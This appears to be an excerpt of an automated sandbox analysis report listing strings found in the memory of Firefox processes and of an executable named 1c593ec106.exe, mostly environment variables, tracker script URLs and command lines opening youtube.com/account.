Source: firefox.exe, 0000001D.00000002.2643811635.000001F414174000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2580813098.000001CBE7950000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2817649774.0000025C6DB07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2590223303.000001DEF7FD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account--attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2625098000.00000238E7430000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account< equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2817649774.0000025C6DB00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Local\Temp\1000017001\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2590223303.000001DEF7FD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2625098000.00000238E7430000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default; equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2580813098.000001CBE7950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exewinsta0\default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: FileUtils_openSafeFileOutputStreamFileUtils_closeSafeFileOutputStream://www.everestjs.net/static/st.v3.js://c.amazon-adsystem.com/aax2/apstag.jswebcompat-reporter%40mozilla.org:1.5.1@mozilla.org/addons/addon-manager-startup;1://pub.doubleverify.com/signals/pub.js*://auth.9c9media.ca/auth/main.jswebcompat-reporter@mozilla.org.xpi://static.chartbeat.com/js/chartbeat_video.jshttps://smartblock.firefox.etp/facebook.svg://static.chartbeat.com/js/chartbeat.js://libs.coremetrics.com/eluminate.jsresource://gre/modules/FileUtils.sys.mjs://.imgur.com/js/vendor..bundle.js@mozilla.org/network/file-output-stream;1FileUtils_closeAtomicFileOutputStream://track.adform.net/serving/scripts/trackpoint/://static.criteo.net/js/ld/publishertag.js://web-assets.toggl.com/app/assets/scripts/.js://www.rva311.com/static/js/main..chunk.js://connect.facebook.net//sdk.jsresource://gre/modules/addons/XPIProvider.jsm://www.google-analytics.com/analytics.js://www.google-analytics.com/plugins/ua/ec.js://s0.2mdn.net/instream/html5/ima3.js://imasdk.googleapis.com/js/sdkloader/ima3.js://cdn.adsafeprotected.com/iasPET.1.js://cdn.optimizely.com/public/.js://.vidible.tv//vidible-min.js://www.googletagmanager.com/gtm.js://pagead2.googlesyndication.com/tag/js/gpt.js://static.adsafeprotected.com/iasPET.1.js://.moatads.com//moatheader.js*://js.maxmind.com/js/apis/geoip2//geoip2.js://s.webtrends.com/js/advancedLinkTracking.js://www.google-analytics.com/gtm/js*://s.webtrends.com/js/webtrends.js://s.webtrends.com/js/webtrends.min.jsTelemetrySession::onEnvironmentChange equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8F6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: HDAUDIO\FUNC_01&VEN_15AD&DEV_1975&SUBSYS_15AD1975&REV_1001\4&32275da5&0&0001_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORT equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2625098000.00000238E745F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2625566496.00000238E7603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account' equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.2942352042.00000286233A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account+ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2643663526.000001F414100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account_ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3324817796.000002863136A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: PORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=CKK equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 00000009.00000002.2967483473.0000000006699000.00000004.00000020.00020000.00000000.sdmp, 1c593ec106.exe, 0000000C.00000002.2966270641.000000000673D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000023.00000002.3358002708.0000028632E49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: about:certerror?e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2643811635.000001F414170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: aming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\bro equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3324817796.0000028631391000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: detectportal.prod.mozaws.netPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOM equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: devtools.performance.recording.ui-base-urldevtools/client/framework/devtools-browser@mozilla.org/uriloader/handler-service;1^([a-z][a-z0-9.+\t-])(:\|;)?(\/\/)?devtools.debugger.remote-websocketbrowser.fixup.domainsuffixwhitelist.Got invalid request to save JSON dataresource://devtools/server/devtools-server.jsUnable to start devtools server on get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPget FIXUP_FLAGS_MAKE_ALTERNATE_URIFailed to listen. Listener already attached.get FIXUP_FLAG_FORCE_ALTERNATE_URI@mozilla.org/network/protocol;1?name=filereleaseDistinctSystemPrincipalLoaderNo callback set for this channel.@mozilla.org/network/protocol;1?name=default@mozilla.org/dom/slow-script-debug;1browser.fixup.dns_first_for_single_words{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}WebChannel/this._originCheckCallbackJSON Viewer's onSave failed in startPersistence^([a-z+.-]+:\/{0,3})([^\/@]+@).+Failed to listen. Callback argument missing.devtools.performance.popup.feature-flagdevtools/client/framework/devtoolsFailed to execute WebChannel callback:^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]\|$)DevToolsStartup.jsm:handleDebuggerFlagDevTools telemetry entry point failed: resource://devtools/shared/security/socket.jsbrowser.urlbar.dnsResolveFullyQualifiedNamesresource://gre/modules/ExtHandlerService.sys.mjs{c6cf88b7-452e-47eb-bdc9-86e3561648ef}resource://gre/modules/URIFixup.sys.mjs@mozilla.org/network/async-stream-copier;1http://www.inbox.lv/rfc2368/?value=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/JSONFile.sys.mjsresource://gre/modules/NetUtil.sys.mjs{33d75835-722f-42c0-89cc-44f328e56a86}resource://gre/modules/FileUtils.sys.mjs_finalizeInternal/this._finalizePromise<extractScheme/fixupChangedProtocol<@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/web-handler-app;1http://compose.mail.yahoo.co.jp/ym/Compose?To=%shandlerSvc fillHandlerInfo: don't know this typeresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/JSONFile.sys.mjshttps://mail.inbox.lv/compose?to=%s@mozilla.org/uriloader/dbus-handler-app;1Scheme should be either http or https_injectDefaultProtocolHandlersIfNeededhttp://win.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/network/file-input-stream;1Can't invoke URIFixup in the content processgecko.handlerService.defaultHandlersVersionhttps://mail.yahoo.co.jp/compose/?To=%shttp://poczta.interia.pl/mh/?mailto=%shttps://poczta.interia.pl/mh/?mailto=%sisDownloadsImprovementsAlreadyMigratedresource://gre/modules/DeferredTask.sys.mjs@mozilla.org/network/input-stream-pump;1SEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLhttps://mail.yahoo.co.jp/compose/?To=%shttps://mail.yandex.ru/compose?mailto=%s@mozilla.org/network/simple-stream-listener;1First argument should be an nsIInputStreamNon-zero amount of bytes must be specifiedhttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://poczta.interia.pl/mh/?mailto=%snewChannel requires a single object argumenthttps://mail.inbox.lv/compose?to=%spdfjs.pre
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: dom.sitepermsaddon-provider.enabledonPrefEnabledChanged() - adding gmp directory onPrefEMEGlobalEnabledChanged() id= - the given reason to update is not supportedmedia.gmp-manager.secondsBetweenChecksipc:first-content-process-createdstartup - adding clearkey CDM failedfindUpdates() - found update for This should only be called from XPCShell testsstartup - adding gmp directory failed with startup - adding clearkey CDM directory webcompat-reporter@mozilla.org.xpiFileUtils_openSafeFileOutputStreamwebcompat-reporter%40mozilla.org:1.5.1FileUtils_closeSafeFileOutputStream@mozilla.org/network/file-output-stream;1resource://gre/modules/addons/XPIProvider.jsmhttps://smartblock.firefox.etp/facebook.svghttps://smartblock.firefox.etp/play.svg://track.adform.net/serving/scripts/trackpoint/://c.amazon-adsystem.com/aax2/apstag.js://cdn.branch.io/branch-latest.min.js://auth.9c9media.ca/auth/main.js://static.chartbeat.com/js/chartbeat.jspictureinpicture%40mozilla.org:1.0.0@mozilla.org/network/atomic-file-output-stream;1@mozilla.org/addons/addon-manager-startup;1://static.criteo.net/js/ld/publishertag.jsFileUtils_openAtomicFileOutputStream://.imgur.io/js/vendor..bundle.js://www.everestjs.net/static/st.v3.js@mozilla.org/network/safe-file-output-stream;1://pub.doubleverify.com/signals/pub.js://www.rva311.com/static/js/main..chunk.js://web-assets.toggl.com/app/assets/scripts/.js://connect.facebook.net//sdk.js*://static.chartbeat.com/js/chartbeat_video.js://connect.facebook.net//all.jsresource://gre/modules/FileUtils.sys.mjs://libs.coremetrics.com/eluminate.js://.imgur.com/js/vendor..bundle.jsresource://gre/modules/AsyncShutdown.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: get serviceWorkersTestingEnabledhttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3324817796.0000028631391000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: gram Fles\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreport equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp, 1c593ec106.exe, 0000000C.00000002.2961150668.00000000066D2000.00000004.00000020.00020000.00000000.sdmp, 1c593ec106.exe, 0000000C.00000002.2941021583.000000000240C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account7 equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account= equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 0000001F.00000002.2963560119.0000000006D92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account>mJ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.2938979510.0000028621A03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account@ equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountI equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 0000000C.00000002.2961150668.00000000066D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountQ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2625566496.00000238E7603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account` equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountmain/nimbus-desktop-experimentsmain/nimbus-desktop-experimentsupgrade-spotlight-rolloutserp-ad-telemetry-rollouthttpSpeculativeParallelLimitmain/nimbus-desktop-experimentsINVALID_SHAREABLE_SCHEMES equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 0000000C.00000002.2961150668.00000000066D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountt equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 00000009.00000002.2964260464.0000000006630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/accountw equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 00000009.00000002.2939170613.00000000021CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account} equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000003.2579353074.000001CBE7979000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2578648250.000001CBE796C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2581052147.000001CBE797A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: set suspendMediaWhenInactivehttps://www.youtube.com/accountbrowser-delayed-startup-finishedauthorStyleDisabledDefaultresetLocationChangeRateLimitget authorStyleDisabledDefaultbrowsing-context-discardedset authorStyleDisabledDefaultserviceWorkersTestingEnabledgetAllBrowsingContextsInSubtreeget serviceWorkersTestingEnabledhttps://www.youtube.com/accounttoolkit.singletonWindowType_downloadTypesViewableInternally_shouldViewDownloadInternally/<getMostRecentBrowserWindowpreviousHandler.preferredAction.PREF_BRANCH_PREVIOUS_ACTIONgetCurrentInnerWindowWithIdhttps://www.youtube.com/account@mozilla.org/browser/clh;1PREF_BRANCH_WAS_REGISTEREDnotifyStartDelayedAutoplayMediawebcompat-reporter@mozilla.orgWeb Compatibility Interventions equals www.youtube.com (Youtube)
